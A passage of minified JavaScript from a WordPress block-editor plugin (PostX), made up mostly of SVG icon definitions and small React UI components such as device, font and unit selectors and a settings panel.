6.372)",cx:"14.4",cy:"6.4",r:"6.4"})),user:(0,o.createElement)("svg",{xmlns:"http://www.w3.org/2000/svg",viewBox:"0 0 18 20"},(0,o.createElement)("path",{d:"M18,19 C18,19.5522847 17.5522847,20 17,20 C16.4477153,20 16,19.5522847 16,19 L16,17 C16,15.3431458 14.6568542,14 13,14 L5,14 C3.34314575,14 2,15.3431458 2,17 L2,19 C2,19.5522847 1.55228475,20 1,20 C0.44771525,20 0,19.5522847 0,19 L0,17 C0,14.2385763 2.23857625,12 5,12 L13,12 C15.7614237,12 18,14.2385763 18,17 L18,19 Z M9,10 C6.23857625,10 4,7.76142375 4,5 C4,2.23857625 6.23857625,0 9,0 C11.7614237,0 14,2.23857625 14,5 C14,7.76142375 11.7614237,10 9,10 Z M9,8 C10.6568542,8 12,6.65685425 12,5 C12,3.34314575 10.6568542,2 9,2 C7.34314575,2 6,3.34314575 6,5 C6,6.65685425 7.34314575,8 9,8 Z"})),desktop:(0,o.createElement)("svg",{xmlns:"http://www.w3.org/2000/svg",viewBox:"0 0 20 20"},(0,o.createElement)("rect",{x:"0",fill:"none",width:"20",height:"20"}),(0,o.createElement)("g",null,(0,o.createElement)("path",{d:"M3 2h14c.55 0 1 .45 1 1v10c0 .55-.45 1-1 1h-5v2h2c.55 0 1 .45 1 1v1H5v-1c0-.55.45-1 1-1h2v-2H3c-.55 0-1-.45-1-1V3c0-.55.45-1 1-1zm13 9V4H4v7h12zM5 5h9L5 9V5z"}))),laptop:(0,o.createElement)("svg",{xmlns:"http://www.w3.org/2000/svg",viewBox:"0 0 24 24"},(0,o.createElement)("path",{d:"M20.5 16h-.7V8c0-1.1-.9-2-2-2H6.2c-1.1 0-2 .9-2 2v8h-.7c-.8 0-1.5.7-1.5 1.5h20c0-.8-.7-1.5-1.5-1.5zM5.7 8c0-.3.2-.5.5-.5h11.6c.3 0 .5.2.5.5v7.6H5.7V8z"})),tablet:(0,o.createElement)("svg",{xmlns:"http://www.w3.org/2000/svg",viewBox:"0 0 20 20"},(0,o.createElement)("rect",{x:"0",fill:"none",width:"20",height:"20"}),(0,o.createElement)("g",null,(0,o.createElement)("path",{d:"M4 2h12c.55 0 1 .45 1 1v14c0 .55-.45 1-1 1H4c-.55 0-1-.45-1-1V3c0-.55.45-1 1-1zm11 14V4H5v12h10zM6 5h6l-6 5V5z"}))),mobile:(0,o.createElement)("svg",{xmlns:"http://www.w3.org/2000/svg",viewBox:"0 0 20 20"},(0,o.createElement)("rect",{x:"0",fill:"none",width:"20",height:"20"}),(0,o.createElement)("g",null,(0,o.createElement)("path",{d:"M6 2h8c.55 0 1 .45 1 1v14c0 .55-.45 1-1 1H6c-.55 0-1-.45-1-1V3c0-.55.45-1 1-1zm7 12V4H7v10h6zM8 5h4l-4 5V5z"}))),angry_line:(0,o.createElement)("svg",{xmlns:"http://www.w3.org/2000/svg",viewBox:"0 0 48 48"},(0,o.createElement)("g",null,(0,o.createElement)("path",{d:"M24 4.1A19.9 19.9 0 1 1 4.1 24 19.767 19.767 0 0 1 24 4.1M24 0a24 24 0 1 0 16.97 7.03A24.006 24.006 0 0 0 24 0"}),(0,o.createElement)("path",{d:"M31.79 36.919a1.5 1.5 0 0 1-1.28-.717 7.644 7.644 0 0 0-13.02 0 1.5 1.5 0 1 1-2.558-1.566 10.642 10.642 0 0 1 18.136 0 1.5 1.5 0 0 1-1.278 2.283"}),(0,o.createElement)("path",{d:"M19.003 17.219a1.482 1.482 0 0 1-.778-.219l-4.079-2.481a1.5 1.5 0 0 1 1.558-2.563l4.079 2.482a1.5 1.5 0 0 1-.78 2.781"}),(0,o.createElement)("path",{d:"M28.996 17.219a1.5 1.5 0 0 1-.78-2.781l4.079-2.482a1.5 1.5 0 0 1 1.558 2.563L29.774 17a1.482 1.482 0 0 1-.778.219"}),(0,o.createElement)("path",{d:"M35.355 22.728c0 2.49-1.45 4.53-3.25 4.53s-3.28-2.04-3.28-4.53c0-2.51 1.48-4.52 3.28-4.52 1.77 0 3.25 2.01 3.25 4.52"}),(0,o.createElement)("path",{d:"M19.175 22.728c0 2.49-1.48 4.53-3.28 4.53s-3.25-2.04-3.25-4.53c0-2.51 1.44-4.52 3.25-4.52s3.28 2.01 3.28 4.52"}))),angry_solid:(0,o.createElement)("svg",{xmlns:"http://www.w3.org/2000/svg",viewBox:"0 0 48 48"},(0,o.createElement)("path",{d:"M40.97 7.03A24 24 0 1 0 48 24a24 24 0 0 0-7.03-16.97m-12.85 5.48.01-.01 4.08-2.46a1.605 1.605 0 0 1 1.21-.21 1.639 1.639 0 0 1 .51 2.99l-4.08 2.49a1.537 1.537 0 0 1-.85.22 1.71 1.71 0 0 1-1.41-.75 1.677 1.677 0 0 1 .53-2.27m7.23 8.99c0 2.49-1.45 4.53-3.25 4.53s-3.28-2.04-3.28-4.53c0-2.51 1.48-4.52 3.28-4.52 1.77 0 3.25 2.01 3.25 4.52M13.53 10.59a1.617 1.617 0 0 1 1.02-.75 1.537 1.537 0 0 1 1.22.21l4.07 2.45a1.631 1.631 0 0 1-.84 3.03 1.537 1.537 0 0 1-.85-.22l-4.08-2.49a1.625 1.625 0 0 1-.54-2.23m2.36 6.39c1.8 0 3.28 2.01 3.28 4.52 0 2.49-1.48 4.53-3.28 4.53s-3.25-2.04-3.25-4.53c0-2.51 1.44-4.52 3.25-4.52m20.25 20.56-.01.01a1.706 1.706 0 0 1-.83.23 1.633 1.633 0 0 1-1.4-.78 11.636 11.636 0 0 0-19.81 0 1.673 1.673 0 0 1-2.26.55 1.654 1.654 0 0 1-.73-1.04 1.61 1.61 0 0 1 .22-1.21 14.867 14.867 0 0 1 25.36.01 1.626 1.626 0 0 1-.54 2.23"})),confused_line:(0,o.createElement)("svg",{xmlns:"http://www.w3.org/2000/svg",viewBox:"0 0 48 48"},(0,o.createElement)("g",null,(0,o.createElement)("path",{d:"M24 4.1A19.9 19.9 0 1 1 4.1 24 19.767 19.767 0 0 1 24 4.1M24 0a24 24 0 1 0 16.97 7.03A24.006 24.006 0 0 0 24 0"}),(0,o.createElement)("path",{d:"M19.633 37.082a1.5 1.5 0 0 1-1.418-1.983 12.827 12.827 0 0 1 6.2-6.838c3.287-1.57 7.2-1.546 11.637.069a1.5 1.5 0 0 1-1.027 2.818c-3.633-1.323-6.756-1.388-9.283-.2a9.923 9.923 0 0 0-4.694 5.125 1.506 1.506 0 0 1-1.418 1.005"}),(0,o.createElement)("path",{d:"M35.355 17.11c0 2.49-1.45 4.53-3.25 4.53s-3.28-2.04-3.28-4.53c0-2.51 1.48-4.52 3.28-4.52 1.77 0 3.25 2.01 3.25 4.52"}),(0,o.createElement)("path",{d:"M19.175 17.11c0 2.49-1.48 4.53-3.28 4.53s-3.25-2.04-3.25-4.53c0-2.51 1.44-4.52 3.25-4.52s3.28 2.01 3.28 4.52"}))),confused_solid:(0,o.createElement)("svg",{xmlns:"http://www.w3.org/2000/svg",viewBox:"0 0 48 48"},(0,o.createElement)("path",{d:"M40.97 7.03A24 24 0 1 0 48 24a23.934 23.934 0 0 0-7.03-16.97m-8.85 4.4c1.78 0 3.25 2.01 3.25 4.52 0 2.49-1.44 4.53-3.25 4.53s-3.28-2.04-3.28-4.53c0-2.51 1.48-4.52 3.28-4.52m-16.21 9.05c-1.8 0-3.25-2.04-3.25-4.53 0-2.51 1.45-4.52 3.25-4.52s3.28 2.01 3.28 4.52c0 2.49-1.48 4.53-3.28 4.53m21.17 9.84a1.658 1.658 0 0 1-2.09.98c-3.6-1.32-6.68-1.39-9.17-.22a9.783 9.783 0 0 0-4.62 5.04 1.659 1.659 0 0 1-1.55 1.11 1.3 1.3 0 0 1-.56-.11 1.562 1.562 0 0 1-.9-.78 1.713 1.713 0 0 1-.1-1.26 13.126 13.126 0 0 1 6.29-6.93c3.3-1.59 7.25-1.57 11.73.07a1.564 1.564 0 0 1 .92.83 1.6 1.6 0 0 1 .05 1.27"})),happy_line:(0,o.createElement)("svg",{xmlns:"http://www.w3.org/2000/svg",viewBox:"0 0 48 48"},(0,o.createElement)("g",null,(0,o.createElement)("path",{d:"M24 4.1A19.9 19.9 0 1 1 4.1 24 19.766 19.766 0 0 1 24 4.1M24 0a24 24 0 1 0 16.969 7.03A24.006 24.006 0 0 0 24 0"}),(0,o.createElement)("path",{d:"M36.191 26.853a12.192 12.192 0 0 1-24.383 0Z"}),(0,o.createElement)("path",{d:"M35.356 16.741c0 2.49-1.45 4.53-3.25 4.53s-3.28-2.04-3.28-4.53c0-2.51 1.48-4.52 3.28-4.52 1.77 0 3.25 2.01 3.25 4.52"}),(0,o.createElement)("path",{d:"M19.175 16.741c0 2.49-1.48 4.53-3.28 4.53s-3.25-2.04-3.25-4.53c0-2.51 1.44-4.52 3.25-4.52s3.28 2.01 3.28 4.52"}))),happy_solid:(0,o.createElement)("svg",{xmlns:"http://www.w3.org/2000/svg",viewBox:"0 0 48 48"},(0,o.createElement)("path",{d:"M40.97 7.03A24 24 0 1 0 48 24a23.934 23.934 0 0 0-7.03-16.97m-8.85 4.4c1.77 0 3.25 2.01 3.25 4.52 0 2.49-1.45 4.53-3.25 4.53s-3.28-2.04-3.28-4.53c0-2.51 1.48-4.52 3.28-4.52m-16.21 0c1.8 0 3.28 2.01 3.28 4.52 0 2.49-1.48 4.53-3.28 4.53s-3.25-2.04-3.25-4.53c0-2.51 1.44-4.52 3.25-4.52m8 27.39a12.16 12.16 0 0 1-12.08-12.08H36.2a12.166 12.166 0 0 1-12.29 12.08"})),smile_line:(0,o.createElement)("svg",{xmlns:"http://www.w3.org/2000/svg",viewBox:"0 0 48 48"},(0,o.createElement)("g",null,(0,o.createElement)("path",{d:"M24 4.1A19.9 19.9 0 1 1 4.1 24 19.766 19.766 0 0 1 24 4.1M24 0a24 24 0 1 0 16.97 7.03A24.006 24.006 0 0 0 24 0"}),(0,o.createElement)("path",{d:"M24 37.641a14.635 14.635 0 0 1-12.576-7.034 1.5 1.5 0 1 1 2.558-1.567 11.76 11.76 0 0 0 20.036 0 1.5 1.5 0 1 1 2.558 1.567A14.638 14.638 0 0 1 24 37.641"}),(0,o.createElement)("path",{d:"M35.355 17.962c0 2.49-1.45 4.53-3.25 4.53s-3.28-2.04-3.28-4.53c0-2.51 1.48-4.52 3.28-4.52 1.77 0 3.25 2.01 3.25 4.52"}),(0,o.createElement)("path",{d:"M19.175 17.962c0 2.49-1.48 4.53-3.28 4.53s-3.25-2.04-3.25-4.53c0-2.51 1.44-4.52 3.25-4.52s3.28 2.01 3.28 4.52"}))),smile_solid:(0,o.createElement)("svg",{xmlns:"http://www.w3.org/2000/svg",viewBox:"0 0 48 48"},(0,o.createElement)("path",{d:"M40.96 7.03A23.992 23.992 0 1 0 48 24a23.928 23.928 0 0 0-7.04-16.97m-8.859 6.43c1.769 0 3.25 2.01 3.25 4.52 0 2.49-1.451 4.53-3.25 4.53s-3.281-2.04-3.281-4.53c0-2.51 1.481-4.52 3.281-4.52m-16.211 0c1.8 0 3.281 2.01 3.281 4.52 0 2.49-1.481 4.53-3.281 4.53s-3.25-2.04-3.25-4.53c0-2.51 1.44-4.52 3.25-4.52m20.791 17.22A14.737 14.737 0 0 1 24 37.78a14.754 14.754 0 0 1-12.69-7.1 1.622 1.622 0 0 1-.19-1.25 1.6 1.6 0 0 1 .731-.99 1.687 1.687 0 0 1 1.26-.18 1.545 1.545 0 0 1 .979.73 11.645 11.645 0 0 0 19.821 0 1.57 1.57 0 0 1 1.01-.75 1.533 1.533 0 0 1 1.229.21 1.553 1.553 0 0 1 .72.97 1.641 1.641 0 0 1-.189 1.26"})),share_line:(0,o.createElement)("svg",{xmlns:"http://www.w3.org/2000/svg",viewBox:"0 0 49.04 47.56"},(0,o.createElement)("path",{stroke:"rgba(0,0,0,0)",strokeMiterlimit:"10",d:"M12.959 43.4a8.527 8.527 0 0 1-8.527-14.745 21.412 21.412 0 0 1-.071-1.763 20.16 20.16 0 0 1 11.64-18.264 8.527 8.527 0 0 1 17.035-.01 20.194 20.194 0 0 1 11.638 18.274c0 .6-.024 1.189-.071 1.761A8.528 8.528 0 0 1 36.078 43.4a20.121 20.121 0 0 1-23.119 0Zm11.564-.447a15.859 15.859 0 0 0 8.388-2.373 8.53 8.53 0 0 1 7.088-13.28q.285 0 .571.019.005-.211.005-.425a16.1 16.1 0 0 0-8.4-14.116 8.53 8.53 0 0 1-15.318.007 16.062 16.062 0 0 0-8.4 14.109q0 .213.005.425.287-.019.573-.019a8.53 8.53 0 0 1 7.087 13.286 15.885 15.885 0 0 0 8.401 2.371Zm11.634-9.339a4.432 4.432 0 0 0 1.62 6.048 4.374 4.374 0 0 0 2.206.595 4.447 4.447 0 0 0 3.842-2.217 4.428 4.428 0 0 0-3.826-6.64 4.448 4.448 0 0 0-3.842 2.214Zm-29.325-1.62a4.421 4.421 0 1 0 2.207-.6 4.358 4.358 0 0 0-2.207.6Zm17.685-18.538a4.428 4.428 0 1 0-4.427-4.428 4.433 4.433 0 0 0 4.427 4.428Z"})),share:(0,o.createElement)("svg",{xmlns:"http://www.w3.org/2000/svg",viewBox:"0 0 36 42.16"},(0,o.createElement)("path",{d:"M30.478 30.796a5.339 5.339 0 0 0-2.867.85l-12.319-8.39a7.556 7.556 0 0 0 .319-2.23 7.133 7.133 0 0 0-.637-2.973l11.787-8.071a5.362 5.362 0 0 0 3.611 1.274A5.665 5.665 0 0 0 36 5.628 5.574 5.574 0 0 0 30.478 0a5.665 5.665 0 0 0-5.628 5.628 4.409 4.409 0 0 0 .318 1.7l-11.894 8.071a7.619 7.619 0 0 0-5.416-2.23 7.859 7.859 0 0 0 0 15.717 7.571 7.571 0 0 0 5.947-2.762l11.576 7.859a5.042 5.042 0 0 0-.638 2.549 5.629 5.629 0 1 0 5.735-5.735"})),apple_solid:(0,o.createElement)("svg",{xmlns:"http://www.w3.org/2000/svg",viewBox:"0 0 39.1 48"},(0,o.createElement)("g",null,(0,o.createElement)("path",{d:"M37.851 16.352a10.875 10.875 0 0 0-5.2 9.149 10.585 10.585 0 0 0 6.445 9.71 25.175 25.175 0 0 1-3.3 6.815c-2.055 2.958-4.2 5.912-7.467 5.912s-4.107-1.9-7.876-1.9c-3.674 0-4.981 1.959-7.968 1.959s-5.071-2.737-7.468-6.1A29.422 29.422 0 0 1 0 25.997C0 16.661 6.07 11.71 12.044 11.71c3.175 0 5.821 2.084 7.814 2.084 1.9 0 4.855-2.209 8.467-2.209a11.323 11.323 0 0 1 9.523 4.764"}),(0,o.createElement)("path",{d:"M29.162.78a10.4 10.4 0 0 1-9.774 10.385c-.02-.251-.03-.521-.03-.781A10.387 10.387 0 0 1 29.132-.003c.02.25.03.52.03.78"}))),android_solid:(0,o.createElement)("svg",{xmlns:"http://www.w3.org/2000/svg",viewBox:"0 0 41.4 48"},(0,o.createElement)("g",null,(0,o.createElement)("path",{d:"M7.689 34.989a3.728 3.728 0 0 0 3.717 3.717h1.24v6.2a3.1 3.1 0 1 0 6.195 0v-6.2h3.718v6.2a3.1 3.1 0 1 0 6.195 0v-6.2h1.239a3.728 3.728 0 0 0 3.718-3.717V16.4H7.689Z"}),(0,o.createElement)("path",{d:"M38.3 15.529a3.1 3.1 0 0 0-3.1 3.1v12.389a3.1 3.1 0 1 0 6.2 0V18.627a3.1 3.1 0 0 0-3.1-3.1"}),(0,o.createElement)("path",{d:"M3.1 15.529a3.1 3.1 0 0 0-3.1 3.1v12.389a3.1 3.1 0 1 0 6.2 0V18.627a3.1 3.1 0 0 0-3.1-3.1"}),(0,o.createElement)("path",{d:"M27.742 3.979 29.414.917a.62.62 0 0 0-1.087-.594l-1.658 3.034a12.942 12.942 0 0 0-11.939 0L13.073.323a.62.62 0 0 0-1.087.594l1.672 3.062a12.989 12.989 0 0 0-5.969 10.93h26.022a12.989 12.989 0 0 0-5.969-10.93m-12.618 6.593a1.239 1.239 0 1 1 1.239-1.239 1.239 1.239 0 0 1-1.239 1.239m11.152 0a1.239 1.239 0 1 1 1.239-1.239 1.239 1.239 0 0 1-1.239 1.239"}))),google_solid:(0,o.createElement)("svg",{xmlns:"http://www.w3.org/2000/svg",viewBox:"0 0 47.04 48"},(0,o.createElement)("path",{d:"M24 19.625v8.907h13.227a11.731 11.731 0 0 1-4.907 7.786 14.2 14.2 0 0 1-8.32 2.4 14.447 14.447 0 0 1-13.653-9.973 14.764 14.764 0 0 1-.8-4.747 15.523 15.523 0 0 1 .773-4.746A14.507 14.507 0 0 1 24 9.278a13.3 13.3 0 0 1 9.28 3.574l6.773-6.614A23.061 23.061 0 0 0 24-.002a24 24 0 0 0 0 48 22.873 22.873 0 0 0 15.893-5.813c4.534-4.187 7.147-10.347 7.147-17.653a20.536 20.536 0 0 0-.507-4.907Z"})),messenger:(0,o.createElement)("svg",{xmlns:"http://www.w3.org/2000/svg",viewBox:"0 0 45.9 46"},(0,o.createElement)("path",{d:"M45.878 21.53a22.829 22.829 0 0 0-11.4-18.668A24.873 24.873 0 0 0 29.601.83c-8-2.207-17.84 0-23.634 6.161a22.752 22.752 0 0 0-3.4 25.841 18.3 18.3 0 0 0 3.954 5.242A3.676 3.676 0 0 1 7.9 40.833c0 1.287-.368 3.678.736 4.69 1.1 1.1 3.035 0 4.23-.552a7.059 7.059 0 0 1 5.426-.828 25.827 25.827 0 0 0 7.541.276 22.567 22.567 0 0 0 17.38-11.4 21.2 21.2 0 0 0 2.667-11.5m-14.1 2.964ZM30.632 26.155a6.715 6.715 0 0 1-1.584 2.2 3.2 3.2 0 0 1-4.137.088c-1.672-1.232-3.344-2.464-5.016-3.784a1.454 1.454 0 0 0-1.761 0c-2.288 1.76-4.576 3.432-6.864 5.192a1.048 1.048 0 0 1-1.5-1.408c1.849-2.9 3.7-5.9 5.545-8.8.264-.44.616-.88.88-1.408a3.172 3.172 0 0 1 2.817-1.584 3.526 3.526 0 0 1 2.024.7c1.584.968 3.08 2.376 4.664 3.52l.792.528c.969.352 2.025-.792 2.729-1.32 1.232-.968 2.464-1.848 3.7-2.816.616-.44 1.144-.88 1.76-1.32a1.08 1.08 0 0 1 1.409.088.966.966 0 0 1 .176 1.32Z"})),microsoft_solid:(0,o.createElement)("svg",{xmlns:"http://www.w3.org/2000/svg",viewBox:"0 0 42 42"},(0,o.createElement)("g",null,(0,o.createElement)("path",{d:"M19.853 0v19.853H0V2.744A2.744 2.744 0 0 1 2.745 0Z"}),(0,o.createElement)("path",{d:"M0 22.146h19.853v19.853H2.745A2.745 2.745 0 0 1 0 39.254Z"}),(0,o.createElement)("path",{d:"M42 2.744v17.109H22.147V0h17.109A2.743 2.743 0 0 1 42 2.744"}),(0,o.createElement)("path",{d:"M22.147 22.146H42v17.108a2.744 2.744 0 0 1-2.744 2.745H22.147Z"}))),mail:(0,o.createElement)("svg",{xmlns:"http://www.w3.org/2000/svg",viewBox:"0 0 50 50"},(0,o.createElement)("path",{d:"M25.034 7.11h21.1c.6 0 1.2.1 1.7.3.4.2.5.3.1.6-1.9 1.8-3.8 3.6-5.8 5.4l-14.9 14.1c-1.1 1.3-2.9 1.4-4.2.4l-.4-.4-20.5-19.5c-.5-.4-.5-.4.2-.7.5-.1.9-.2 1.4-.2h21.3z"}),(0,o.createElement)("path",{d:"M48.134 42.41c-.6.3-1.2.5-1.9.4h-42.4c-.6 0-1.1-.1-1.6-.3-.4-.2-.4-.3-.1-.6l5.1-4.8c3.5-3.3 7-6.6 10.5-10 .3-.3.5-.3.8 0 1.3 1.3 2.6 2.5 4 3.8 1.3 1.5 3.6 1.6 5 .2.1-.1.2-.1.2-.2 1.3-1.3 2.7-2.5 4-3.8.2-.2.3-.2.6 0 5.2 5 10.5 10 15.8 15-.1.2 0 .2 0 .3zM.234 9.71c1.8 2.1 3.8 3.8 5.8 5.7 3.2 3.1 6.5 6.2 9.7 9.3.3.3.3.5 0 .7-4.8 4.5-9.6 9.1-14.4 13.7-.5.4-.8.9-1.1 1.4-.3-1.1-.3-30 0-30.8zM49.934 9.71c.1 10.2.1 20.4 0 30.6-.9-1-1.8-2-2.9-2.8-4.2-4-8.5-8.1-12.7-12.1-.3-.3-.3-.5 0-.8 4.8-4.6 9.6-9.1 14.4-13.7.4-.3.8-.8 1.2-1.2z"})),media_document:(0,o.createElement)("svg",{xmlns:"http://www.w3.org/2000/svg",width:"20",height:"20",viewBox:"0 0 20 20"},(0,o.createElement)("path",{d:"m12 2 4 4v12H4V2h8zM5 3v1h6V3H5zm7 3h3l-3-3v3zM5 5v1h6V5H5zm10 3V7H5v1h10zM5 9v1h4V9H5zm10 3V9h-5v3h5zM5 11v1h4v-1H5zm10 3v-1H5v1h10zm-3 2v-1H5v1h7z"})),full_screen:(0,o.createElement)("svg",{xmlns:"http://www.w3.org/2000/svg",fill:"none",viewBox:"0 0 24 24"},(0,o.createElement)("path",{stroke:"currentColor","stroke-linecap":"round","stroke-linejoin":"round","stroke-width":"1.5",d:"M8 3H4a1 1 0 0 0-1 1v4m5 13H4a1 1 0 0 1-1-1v-4m18-8V4a1 1 0 0 0-1-1h-4m5 13v4a1 1 0 0 1-1 1h-4"})),zoom_in:(0,o.createElement)("svg",{xmlns:"http://www.w3.org/2000/svg",fill:"none",viewBox:"0 0 24 24"},(0,o.createElement)("path",{stroke:"currentColor","stroke-linecap":"round","stroke-linejoin":"round","stroke-width":"1.5",d:"m21 21-4.35-4.35M7.5 11h3.508m0 0H14.5m-3.492 0V7.505m0 3.494v3.506M19 11a8 8 0 1 1-16 0 8 8 0 0 1 16 0Z"})),zoom_out:(0,o.createElement)("svg",{xmlns:"http://www.w3.org/2000/svg",fill:"none",viewBox:"0 0 24 24"},(0,o.createElement)("path",{stroke:"currentColor","stroke-linecap":"round","stroke-linejoin":"round","stroke-width":"1.5",d:"m21 21-4.35-4.35M11 19a8 8 0 1 0 0-16 8 8 0 0 0 0 16Zm-3.5-8h7"})),gallery_indicator:(0,o.createElement)("svg",{xmlns:"http://www.w3.org/2000/svg",fill:"none",viewBox:"0 0 24 24"},(0,o.createElement)("path",{stroke:"currentColor","stroke-linejoin":"round","stroke-width":"1.5",d:"M2 4a1 1 0 0 1 1-1h18a1 1 0 0 1 1 1v10a1 1 0 0 1-1 1H3a1 1 0 0 1-1-1V4Zm0 15a1 1 0 0 1 1-1h2a1 1 0 0 1 1 1v1a1 1 0 0 1-1 1H3a1 1 0 0 1-1-1v-1Zm8 0a1 1 0 0 1 1-1h2a1 1 0 0 1 1 1v1a1 1 0 0 1-1 1h-2a1 1 0 0 1-1-1v-1Zm8 0a1 1 0 0 1 1-1h2a1 1 0 0 1 1 1v1a1 1 0 0 1-1 1h-2a1 1 0 0 1-1-1v-1Z"}),(0,o.createElement)("path",{stroke:"currentColor","stroke-linecap":"round","stroke-width":"1.5",d:"M5 11.352 8.21 8.38a1.48 1.48 0 0 1 1.98 0l1.87 1.731a1.48 1.48 0 0 0 1.98 0l.47-.435a1.48 1.48 0 0 1 1.98 0L19 12"}),(0,o.createElement)("path",{stroke:"currentColor","stroke-width":"1.5",d:"M19 6.5a.5.5 0 1 1-1 0 .5.5 0 0 1 1 0Z"})),...a,...i}},56834:(e,t,l)=>{"use strict";l.d(t,{Z:()=>i});var o=l(67294),a=l(64766);l(98906);const{__}=wp.i18n,i=e=>{const{setDevice:t,device:l}=e,i=[{icon:a.ZP.desktop,value:"lg"},{icon:a.ZP.tablet,value:"sm"},{icon:a.ZP.mobile,value:"xs"}];return(0,o.createElement)("div",{className:"ultp-responsive-device"},(0,o.createElement)("div",{className:"ultp-selected-device"},i.find((e=>e.value==l))?.icon),(0,o.createElement)("div",{className:"ultp-device-dropdown"},i.map(((e,a)=>(0,o.createElement)("div",{key:a,onClick:()=>{return l=e.value,void t(l);var l},className:`ultp-device-dropdown-item ${e.value==l&&"active"}`},e.icon)))))}},45484:(e,t,l)=>{"use strict";l.d(t,{Z:()=>o});const o=[{n:"none",f:"None"},{n:"Arial",f:"sans-serif",v:[100,200,300,400,500,600,700,800,900]},{n:"Tahoma",f:"sans-serif",v:[100,200,300,400,500,600,700,800,900]},{n:"Verdana",f:"sans-serif",v:[100,200,300,400,500,600,700,800,900]},{n:"Helvetica",f:"sans-serif",v:[100,200,300,400,500,600,700,800,900]},{n:"Times New Roman",f:"sans-serif",v:[100,200,300,400,500,600,700,800,900]},{n:"Trebuchet MS",f:"sans-serif",v:[100,200,300,400,500,600,700,800,900]},{n:"Georgia",f:"sans-serif",v:[100,200,300,400,500,600,700,800,900]}]},58421:(e,t,l)=>{"use strict";l.d(t,{Z:()=>a});var o=l(67294);l(48515);const a=e=>{const{setSettings:t,unit:l,value:a="px"}=e,i="object"==typeof l?l:["px","em","rem","%","vh","vw"];return(0,o.createElement)("div",{className:"ultp-field-unit-list"},(0,o.createElement)("div",{className:"ultp-unit-checked"},i.find((e=>e==a))),(0,o.createElement)("div",{className:"ultp-unit-dropdown"},i.length>1&&i.map((e=>(0,o.createElement)("div",{key:e,onClick:()=>{t(e,"unit")},className:`ultp-unit-dropdown-item ${e==a&&"active"}`},e)))))}},70674:(e,t,l)=>{"use strict";l.d(t,{Z:()=>S});var o=l(67294),a=(l(46764),l(8949)),i=l(64766),n=l(60448),r=l(47484),s=l(21525),p=l(22217),c=l(34774),u=l(60405),d=l(27808),m=l(99558);const{__}=wp.i18n,{apiFetch:g,editSite:y,editPost:b,editor:v}=wp,{Fragment:h,useState:f,useEffect:k}=wp.element,{Dropdown:w}=wp.components,{useSelect:x,useDispatch:T}=wp.data,_={editorWidth:(0,o.createElement)("svg",{xmlns:"http://www.w3.org/2000/svg",viewBox:"0 0 50 50"},(0,o.createElement)("path",{d:"m46 22-8-7h-4v4l4 3H12l4-3v-4h-4l-8 7-1 3 1 3 8 7 2 1 2-1v-4l-4-3h26l-4 3v4l2 1 2-1 8-7 1-3-1-3zM2 50l-2-2V2l2-2 1 2v46l-1 2zm46 0-1-2V2l1-2 2 2v46l-2 2z"})),editorColor:(0,o.createElement)("svg",{xmlns:"http://www.w3.org/2000/svg",viewBox:"0 0 50 50"},(0,o.createElement)("path",{d:"M46 10C41 4 33 0 25 0a26 26 0 0 0-10 48s7 3 11 2c2-1 3-2 3-4l-2-5c0-2 1-4 3-4l9-1 6-3c7-6 6-17 1-23zM10 24c-3 0-5-2-5-5s2-5 5-5c2 0 5 3 5 5s-3 5-5 5zm8-10c-2 0-5-2-5-5s3-5 5-5c3 0 5 3 5 5s-2 5-5 5zm14 0c-3 0-5-2-5-5s2-5 5-5 5 3 5 5-2 5-5 5zm9 10c-2 0-5-2-5-5s2-5 5-5 5 3 5 5-2 5-5 5z"})),editorBreak:(0,o.createElement)("svg",{xmlns:"http://www.w3.org/2000/svg",viewBox:"0 0 50 50"},(0,o.createElement)("path",{d:"M46 0H17c-2 0-4 2-4 4v6h20c4 0 7 3 7 7v20h6c2 0 4-2 4-4V4c0-2-2-4-4-4z"}),(0,o.createElement)("path",{d:"M33 14H4c-2 0-4 1-4 3v29c0 2 2 4 4 4h29c2 0 4-2 4-4V17c0-2-2-4-4-4z"})),logo:(0,o.createElement)("svg",{xmlns:"http://www.w3.org/2000/svg",viewBox:"0 0 50 48.3"},(0,o.createElement)("path",{d:"M23 2c-3 1-5 3-5 6v9H8c-3 0-6 2-6 5l-2-2V3c0-2 1-3 3-3h17l3 2zm22 6v14H31a7 7 0 0 0-6-5h-3V8l1-2 2-1h17c2 0 3 1 3 3zm5 20v17c0 2-1 3-3 3H30l-3-2c3-1 5-3 5-6V26h17l1 2zm-22-5v17l-1 2-2 1H8c-2 0-3-1-3-3V23c0-2 1-3 3-3h17l1 1 2 1v1z"}))},C=e=>{const{children:t,title:l,icon:a,initOpen:i}=e,[n,r]=f(!!i);return(0,o.createElement)("div",{className:"ultp-section-accordion"},(0,o.createElement)("div",{className:"ultp-section-accordion-item ultp-global-accordion-item",onClick:()=>r(!n)},(0,o.createElement)("div",{className:"ultp-global-accordion-title"},a,l,n?(0,o.createElement)("span",{className:"ultp-section-arrow dashicons dashicons-arrow-down-alt2"}):(0,o.createElement)("span",{className:"ultp-section-arrow dashicons dashicons-arrow-up-alt2"}))),(0,o.createElement)("div",{className:"ultp-section-show "+(n?"":"is-hide")},n&&t))},E=()=>(0,o.createElement)("div",null,(0,o.createElement)("div",{className:"ultp-postx-settings-panel-title"},(0,o.createElement)("span",{title:"Go Back","arial-label":"Go Back",role:"button",onClick:()=>{const e=localStorage.getItem("ultp_prev_sel_block");e&&(wp.data.dispatch("core/block-editor").selectBlock().then((()=>{wp.data.dispatch("core/block-editor").selectBlock(e)})),localStorage.removeItem("ultp_prev_sel_block")),wp.data.dispatch("core/edit-post").openGeneralSidebar("edit-post/block")}},i.ZP.leftArrowLg),(0,o.createElement)("span",null,__("PostX Settings","ultimate-post")))),S=e=>{if(!y&&!b)return null;const{isSavingPost:t,isAutosavingPost:l,isDirty:S,isReady:P}=x((e=>{let t=!1;try{t=e("core/editor").__unstableIsEditorReady()}catch(l){try{t=e("core/editor").isCleanNewPost()||e("core/block-editor").getBlockCount()>0}catch(e){}}return{isSavingPost:e("core/editor").isSavingPost(),isAutosavingPost:e("core/editor").isAutosavingPost(),isDirty:e("core/editor").isEditedPostDirty(),isReady:t}})),{editPost:L}=T("core/editor");function 